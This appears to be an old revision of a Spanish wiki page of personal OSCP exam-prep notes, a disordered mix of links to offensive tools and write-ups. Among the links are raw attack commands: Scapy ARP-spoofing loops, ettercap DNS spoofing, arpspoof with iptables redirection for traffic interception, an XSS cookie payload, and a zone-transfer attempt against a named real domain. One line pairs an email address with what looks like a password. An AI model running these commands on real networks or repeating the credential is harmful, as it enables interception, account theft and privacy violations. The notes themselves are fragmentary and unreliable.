¡Esta es una revisión vieja del documento!
Profesional certificado en seguridad ofensiva (OSCP)
Profesional certificado en seguridad ofensiva (OSCP) es una certificación de ethical hacking ofrecida por Offensive Security que enseña metodologías de exámenes de penetración y utilizan herramientas incluyendo el examen de pentración BackTrack (ahora realizado con éxito con la distribución Kali Linux)12 La certificación OSCP consiste en un examen práctico que requiere atacar y penetrar de manera satisfactoria varias maquinas en un ambiente seguro controlado.3 Actualmente, es una de las pocas certificaciones que requiere evidencia de las habilidades en la parte práctica que consiste en una prueba de penetración.
Referencias para prepararse
- shi_ver_bot : A Telegram bot to see if your password was in the BreachCompilation
beef project
sitio de boca buscar alert(document.cookie)</script>
dig @200.111.157.67 unap.cl -t AXFR
portnocking
https://blog.wpscans.com/sniff-wordpress-login-credentials-wireshark-http-connection/
https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://kali.training/lessons/introduction/
https://kali.training/topic/introduction-to-kali-linux/
https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/ https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/
(ip.addr == 10.168.40.145) and (!udp contains “HTTP/1.1”)
https://tools.kali.org/information-gathering/nmap
ip.src == 192.168.0.99 && tcp.flags.syn==1 && tcp.flags.ack==1
https://github.com/alearea51/IKn0wU
https://github.com/TunisianEagles/SocialBox
https://github.com/gentilkiwi/mimikatz https://github.com/AlessandroZ/LaZagne
https://github.com/vk496/linset
https://github.com/WifiPhisher
https://github.com/xtr4nge/FruityWifi
scapy
a = ARP(op=“who-has”, psrc=“192.168.168.2”, pdst=“192.168.168.131”, hwdst=“fe80::4067:2e3f:d06:61bd”)
send(a, inter=3, loop=1)
a = ARP(op=“who-has”, psrc=“10.168.40.1”, pdst=“10.168.40.70”, hwdst=“fe80::4067:2e3f:d06:61bd”)
10.168.40.1
ip a falsear ip victima mac victima a = ARP(op=“who-has”, psrc=“10.168.40.1”, pdst=“10.168.40.70”, hwdst=“08:00:27:52:2D:A0”)
send(a, inter=3, loop=1)
ettercap
ettercap -T -q -i eth0 -P dns_spoof -M arp /10.168.40.145///
tcpdump -n -i wlan0 -e 'arp or icmp'
arping -c 1 -I wlan0 10.168.40.1 ARPING 10.168.40.1 60 bytes from 08:00:27:7e:b5:f7 (10.168.40.1): index=0 time=1.363 msec 60 bytes from 00:17:c5:15:81:6a (10.168.40.1): index=1 time=2.670 msec
— 10.168.40.1 statistics —
https://sandilands.info/sgordon/arp-spoofing-on-wired-lan
mitmproxy
arpspoof -i eth0 -t 10.168.40.70 10.168.40.1
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 iptables -t nat -A PREROUTING -p tcp –destination-port 443 -j REDIRECT –to-port 8080
mitmproxy –mode transparent
bettercap -T ipvictima –proxy -P
https://github.com/byt3bl33d3r/MITMf https://backtrackacademy.com/articulo/saltando-hsts-con-man-in-the-middle-framework http://www.elladodelmal.com/2016/03/ataques-man-in-middle-hsts-sslstrip-2.html
https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/
WIFI
https://github.com/xtr4nge/FruityC2
android https://github.com/M4sc3r4n0/Evil-Droid
extra
https://github.com/nixawk/pentest-wiki
https://geekflare.com/online-scan-website-security-vulnerabilities/
otra
https://es.scribd.com/document/13213787/CUH-E-zine-4%C2%AA-Edicion
https://www.aircrack-ng.org/doku.php?id=es:aireplay-ng https://www.aircrack-ng.org/doku.php?id=es:deauthentication
https://www.offensive-security.com/metasploit-unleashed/
https://blog.segu-info.com.ar/2018/09/examen-de-prueba-para-estudiantes-del.html https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp
OSCP
https://www.sniferl4bs.com/2015/11/entrenando-en-casa-para-rendir-el-oscp.html https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97
https://support.offensive-security.com/#!pwk-support.md https://support.offensive-security.com/#!oscp-exam-guide.md
https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf https://www.securitysift.com/offsec-pwb-oscp/ https://www.adampalmer.me/iodigitalsec/2013/04/11/offensive-security-pwb-course-and-oscp-certification-review/
https://vcatalan.com/2017/01/OSCP-part-I-preparacion-estudio-previo.html
https://mytcpip.com/2017/08/10/taller-de-hacking-i-nmap-a-fondo-metasploit-basico/ https://null-byte.wonderhowto.com/forum/upload-shell-from-phpmyadmin-xampp-by-mohamed-ahmed-0179931/
https://www.exam-labs.com/exam/NSE4#tutorial
https://www.ihacklabs.com/es/el-mejor-sistema-de-pivoting-en-linux/
https://wiki.wireshark.org/SampleCaptures
https://github.com/ibr2/pwk-cheatsheet
https://www.keiththome.com/oscp-course-review/
http://fl3x.us/blog/2015/09/22/order-wireless-devices-for-wifu-course/
https://amonsec.net/course/offensive-security-pwk-course-review
https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/
https://www.ihacklabs.com/es/certificacion-osce-review-cracking-the-perimeter-ctp/
http://www.vividmachines.com/shellcode/shellcode.html
https://www.securitysift.com/offsec-ctp-osce/
https://hackforums.net/member.php cayuqueo@gmail.com EBM1JUD1yq57pmgUAiqHQ
http://nixware.net/my-osce-journey
http://www.cs.virginia.edu/~evans/cs216/guides/x86.html
https://www.pentesteracademy.com/topics
https://openwall.info/wiki/p_lkrg/Main
https://github.com/tanc7/hacking-books
https://infosecuritygeek.com/vulnhub-kioptrix-2014/
http://www.securitysift.com/offsec-pwb-oscp/
https://xapax.gitbooks.io/security/content/
https://medium.com/@bondo.mike/ptp-lab-privilege-escalation-with-services-5d14a99a28d1
https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19
Cupp para crear diccionarios git clone https://github.com/Mebus/cupp.git
Generar ataques de Bruteforce a redes sociales git clone https://github.com/TunisianEagles/SocialBox.git
Dump de passwords (Volcado de memoria) https://github.com/AlessandroZ/LaZagne
Cracking WPA/WPA2 con phishing https://github.com/vk496/linset https://github.com/wifiphisher/wifiphisher
instabridge
–mode transparent
mitm.it/cert/p12
bettercap -T [ip_victima] –proxy -P
Evil-Droid git clone https://github.com/M4sc3r4n0/Evil-Droid.git
https://www.giuspen.com/cherrytree/
https://github.com/mikaelkall/HackingAllTheThings
https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/
https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1
https://github.com/so87/OSCP-PwK
https://medium.com/@chennylmf/hackthebox-lame-c28b19558cb0
https://github.com/OlivierLaflamme/Cheatsheet-God
https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://medium.com/@chennylmf/hackthebox-walkthrough-tartarsauce-810a8df296c1
https://www.giuspen.com/cherrytree/
http://www.fuzzysecurity.com/tutorials/16.html
Good reviews of CTP/OSCE (in no particular order):
Note: * mark means look for other posts on this blog
Tutorial sites (more stars = better/recommended):
Cheatsheets:
Good practice sites:
Vulnerable machines: vulnhub VMs: SickOS 1.1 SickOS 1.2 Droopy v0.2 Kevgir Pegasus SecTalks: BNE0x00 - Minotaur SecTalks: BNE0x03 - Simple NullByte: 1 FristiLeaks 1.3 OWASP Vulnerable Web Applications Directory Project Mutillidae Damn Vulnerable Web Application
LFI/RFI https://penetrate.io/2014/01/10/from-rfi-to-shell/
Backdooring files with Python: https://github.com/secretsquirrel/the-backdoor-factory
eBooks downloads: http://www.ebook777.com/gray-hat-hacking-ethical-hackers-handbook-fourth-edition/ https://github.com/JpGallegos/CySecBooks https://www.securepla.net/the-hacker-playbook-2/ “Hacking: The Art of Exploitation”
https://www.linkedin.com/pulse/osce-cracking-perimeter-experience-sunny-neo - Fuzzing (Scapy, TAO, Sulley) - Linux Exploitation (vanila stack overflow, return to Glibc - NX bypass, repairing stack canaries, ASLR bypasses) and Windows exploitation (SEH overwrite, Return Oriented Programming into disabling DEP) - Web Application Hacker's Handbook (might be too large: Consider “webgoat”)
Various sites: http://www.sweetscape.com/ (010 Editor) https://github.com/campagnola/pycca https://github.com/Gallopsled/pwntools https://github.com/reyammer/shellnoob https://zeltser.com/convert-shellcode-to-assembly/ http://files.cnblogs.com/files/exclm/ollydbg_cmdline_cheat_sheet.pdf http://bernardodamele.blogspot.sg/2011/09/reverse-shells-one-liners.html https://www.digitalocean.com/community/tutorials/how-to-use-bash-history-commands-and-expansions-on-a-linux-vps https://github.com/peterferrie/win-exec-calc-shellcode http://www.secniu.com/why-my-shellcode-cannot-work/ http://thestarman.pcministry.com/asm/2bytejumps.htm http://blog.noobroot.com/ https://www.exploit-db.com/exploits/5342/ http://exploit.co.il/hacking/manual-egghuntershellcode-encoding/ https://github.com/salcho/codetz http://xangosec.blogspot.sg/2014/08/automating-sub-encoder.html http://www.fuzzing.org/ http://resources.infosecinstitute.com/pattern-based-approach-memory-shellcodes-detection/ https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/ https://0x41.no/hacking-networks-with-snmp/ http://danielebellavista.blogspot.sg/2014/10/ia32-shellcodes-get-eip-value.html http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-shells/ http://codemachine.com/downloads.html
Fun random stuff: http://patriciopalladino.com/files/hieroglyphy/ http://n01g3l.tumblr.com/ https://twitter.com/ch3rn0byl/status/832681279900487680
https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-sql-injection/
https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/
https://github.com/vanhoefm/modwifi https://github.com/vanhoefm/blackhat17-pocs
https://github.com/0x90/uberscapy
https://github.com/0x90/wifi-arsenal https://github.com/0x90/kali-scripts
https://nets.ec/Main_Page https://old.exploit-db.com/exploits/13284/
https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html
https://underc0de.org/foro/hacking/que-es-una-shellcode/
https://0x00sec.org/t/linux-shellcoding-part-1-0/289
https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html